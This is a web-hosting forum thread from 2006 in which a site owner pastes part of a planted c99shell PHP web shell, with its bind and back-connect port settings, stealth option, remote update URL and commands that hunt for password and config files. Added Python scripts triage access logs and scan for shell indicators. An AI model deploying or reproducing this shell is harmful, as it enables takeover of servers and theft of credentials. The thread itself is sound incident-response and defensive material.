#1, Foxgguy2001, August 31st, 2006, 10:28 AM
Help! webserver being hacked!

I have a guy who's hacking into my webserver that hosts my site:

http://www.digitaluprising.net

Somehow he's adding files to the public_html directory, and I've changed the password to access the FTP or webserver. I don't know how he's doing it?! Any ideas?

Here's part of a PHP file he's created; I don't know what it will do (I found this in the root dir of "public_html"):
Code:
<?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}

$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

$gzipencode = TRUE; //Encode with gzip?

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server

$filestealth = TRUE; //if TRUE, don't change modify- and access-time

$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

$log_email = "user@host.tld"; //Default e-mail for sending logs

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$exeftypes  = array(
 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
 "perl %f%" => array("pl","cgi")
);

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if TRUE and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  array("config.php",1) // example
);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
 // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99";  // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la"),
  array("find all suid files", "find / -type f -perm -04000 -ls"),
  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  array("find all sgid files", "find / -type f -perm -02000 -ls"),
  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  array("find config.inc.php files", "find / -type f -name config.inc.php"),
  array("find config* files", "find / -type f -name \"config*\""),
  array("find config* files in current dir", "find . -type f -name \"config*\""),
  array("find all writable folders and files", "find / -perm -2 -ls"),
  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  array("find all service.pwd files", "find / -type f -name service.pwd"),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  array("find all .bash_history files", "find / -type f -name .bash_history"),
  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  array("list file attributes on a Linux second extended file system", "lsattr -va"),
  array("show opened ports", "netstat -an | grep -i listen")
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir"),
  array("show opened ports", "netstat -an")
 );
}

$sess_cookie = "c99shvars"; // Cookie-variable name

$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
__________________
www.digitaluprising.net [primary]
on server: Vocal
(72.29.74.35) : Shared
__________________________
www.3extremedesigns.net
on server: Romeo
(72.29.74.111) : Shared
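
The question in this post is how files keep appearing in public_html after the FTP password was changed. A web shell like the one pasted above is normally written by the web server process itself, through a vulnerable script that the attacker reaches over HTTP, so the FTP password is irrelevant and the evidence is in the HTTP access log. The script below is an added example, not code from the thread or from the poster: it parses Apache "combined" format log lines, finds the first request that hit the dropped file, and lists the earlier requests from the same client, which is where the upload vector usually sits. The log lines, client addresses, timestamps and the file name `x.php` are constructed for the example; the `modules.php?name=vwar` path is only a stand-in for the module the thread later names, not a claim about which request was the actual entry point.

```python
"""Access-log triage for a dropped web shell (added example, not from the thread)."""
import re
from collections import defaultdict

# Apache "combined" log format; the constructed SAMPLE_LOG below follows it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    # Drop the query string so /x.php?act=cmd and /x.php compare equal.
    d["script"] = d["path"].split("?", 1)[0]
    return d


def first_hit(entries, shell_script):
    """Index and entry of the earliest request for shell_script (log order is time order)."""
    for i, e in enumerate(entries):
        if e["script"] == shell_script:
            return i, e
    return None, None


def dropper_candidates(entries, shell_script, lookback=50):
    """Requests by the shell's first client that preceded its first use.

    A POST to a script that should not accept uploads, answered with 200, is the
    usual suspect; the scripts themselves still have to be inspected.
    """
    idx, hit = first_hit(entries, shell_script)
    if hit is None:
        return []
    window = entries[max(0, idx - lookback):idx]
    return [e for e in window if e["ip"] == hit["ip"]]


def shell_activity(entries, shell_script):
    """Every request to the shell, grouped by client IP, for the abuse report."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["script"] == shell_script:
            by_ip[e["ip"]].append(e)
    return dict(by_ip)


# Constructed sample log (addresses, times and paths are made up for the example).
SAMPLE_LOG = """\
198.51.100.7 - - [31/Aug/2006:09:58:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.45 - - [31/Aug/2006:10:01:12 -0700] "GET /modules.php?name=vwar HTTP/1.1" 200 3302 "-" "Mozilla/5.0"
203.0.113.45 - - [31/Aug/2006:10:01:40 -0700] "POST /modules.php?name=vwar HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.45 - - [31/Aug/2006:10:02:05 -0700] "GET /x.php HTTP/1.1" 200 14211 "-" "Mozilla/5.0"
203.0.113.45 - - [31/Aug/2006:10:02:30 -0700] "POST /x.php?act=cmd HTTP/1.1" 200 9930 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Aug/2006:10:03:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""


def analyse(log_text=SAMPLE_LOG, shell_script="/x.php"):
    """Parse the log and return the dropper candidates and the shell's usage by IP."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {
        "candidates": dropper_candidates(entries, shell_script),
        "activity": shell_activity(entries, shell_script),
    }


if __name__ == "__main__":
    result = analyse()
    print("Requests from the same client before the shell was first used:")
    for e in result["candidates"]:
        print("  {} {} {} {}".format(e["time"], e["method"], e["path"], e["status"]))
    print("Shell requests per IP:", {ip: len(v) for ip, v in result["activity"].items()})
```

On a real host, feed it the account's access log and the path of the file that was found; on shared hosting the log may only be available through the control panel or from the provider. The POST that precedes the shell's first appearance is the request to hand to the host, together with the client address, when asking them to find and close the hole.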

#2, Skipdawg, August 31st, 2006, 10:37 AM
Well, getmicrotime is a Unix server time function. What is support saying?

#3, Unleashed2k, August 31st, 2006, 10:54 AM
Remove it and contact Surpass ASAP. It's a hacker tool. With this they can see inside all of your folders. I don't know what else it can do.
__________________
“The object of war is not to die for your country, but to make some other bastard die for his.” -George Patton
VPS5
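
Removing the one file that was noticed is the right first step, but the posted configuration shows why it is not enough on its own: the shell can write files anywhere the web server user can, and with `$filestealth = TRUE` it preserves the modify and access times of files it touches, so hunting for recently changed files by mtime is unreliable. The script below is an added example, not code from the thread or from the poster: it walks a web root and flags PHP files whose contents match indicators taken from the posted shell (its `c99sh` names, the `ccteam.ru` update URL, the `$$k = $v` loop that turns every cookie/GET/POST key into a global, the merged request arrays, the bind/back-connect port settings) plus a few generic web-shell tells. The sample files it scans are constructed inside the script; the indicator names and thresholds are the example's own choices.

```python
"""Scan a web root for web-shell indicators (added example, not from the thread)."""
import os
import re
import tempfile

# (name, pattern).  The first six come from the configuration section posted
# in the thread; the last two are generic tells seen in many PHP shells.
INDICATORS = [
    ("c99shell marker", re.compile(r"c99sh(ell)?", re.I)),
    ("ccteam.ru update URL", re.compile(r"ccteam\.ru", re.I)),
    # register_globals emulation: every cookie/GET/POST key becomes a variable
    ("request vars to globals", re.compile(r"\$\$\w+\s*=\s*\$\w+\s*;")),
    ("merged request arrays", re.compile(r"array_merge\(\s*\$_COOKIE\s*,\s*\$_GET\s*,\s*\$_POST")),
    ("bind/back-connect port", re.compile(r"\$(bindport|bc)_port\b")),
    ("ignore_user_abort", re.compile(r"ignore_user_abort\s*\(\s*TRUE\s*\)", re.I)),
    ("eval of decoded payload", re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(")),
    ("command execution", re.compile(r"\b(shell_exec|passthru|system|proc_open|popen)\s*\(")),
]

PHP_EXT = (".php", ".php3", ".php4", ".phtml", ".inc")


def scan_source(text):
    """Names of the indicators that match one file's contents, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_tree(root, min_hits=1):
    """Map relative path -> matched indicators for PHP files with at least min_hits.

    Content is scanned, not timestamps, because the shell's $filestealth option
    keeps mtime/atime unchanged on the files it edits.
    """
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXT):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with open(full, "r", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue
            if len(hits) >= min_hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample tree: a benign file, a shell fragment hidden under an
# innocuous name in the images directory, and a one-line eval backdoor.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; ?>\n",
    "images/cache.php": (
        "<?php\n"
        "$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);\n"
        "foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}\n"
        '$c99sh_updateurl = "http://ccteam.ru/update/c99shell/";\n'
        '$bindport_port = "31373";\n'
    ),
    "lib/helper.php": "<?php\n@eval(base64_decode($_POST['p']));\n",
}


def demo():
    """Write the constructed tree to a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print("{}: {}".format(path, ", ".join(hits)))
```

Run `scan_tree` against a copy of public_html rather than the live tree, and treat a hit as a reason to read the file, not as proof by itself: `system(` also appears in legitimate code. Finding and removing every copy still leaves the hole the attacker came in through, which is the part the host has to help with.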

#4, Foxgguy2001, August 31st, 2006, 11:24 AM
Sent the file as requested, Unleashed. Thanks.

#5, Unleashed2k, August 31st, 2006, 11:57 AM
Can you please get on your AIM?

#6, Unleashed2k, August 31st, 2006, 12:29 PM
This is a very advanced and well-done script. I placed it on one of my servers (a VPS) and got access to root very fast. Hopefully your server can be fixed soon by a level 3 admin or less.

#7, Foxgguy2001, August 31st, 2006, 8:26 PM
I removed it and submitted a request to the help desk. I hope they can help me out. Appreciate you taking a look at it, man. All's well for now. Remote backup done just to be on the safe side.

#8, Foxgguy2001, August 31st, 2006, 11:16 PM
Apparently they were hacking in via a module I had on my PHP-Nuke site called "vwar". The Surpass admins helped me get the holes closed up; I had to disable the module till I get it figured out. Very appreciative of the quick response and all the help.
Thanks guys.

#9, Skipdawg, August 31st, 2006, 11:29 PM
Awesome! It's just amazing what all hackers can do sometimes.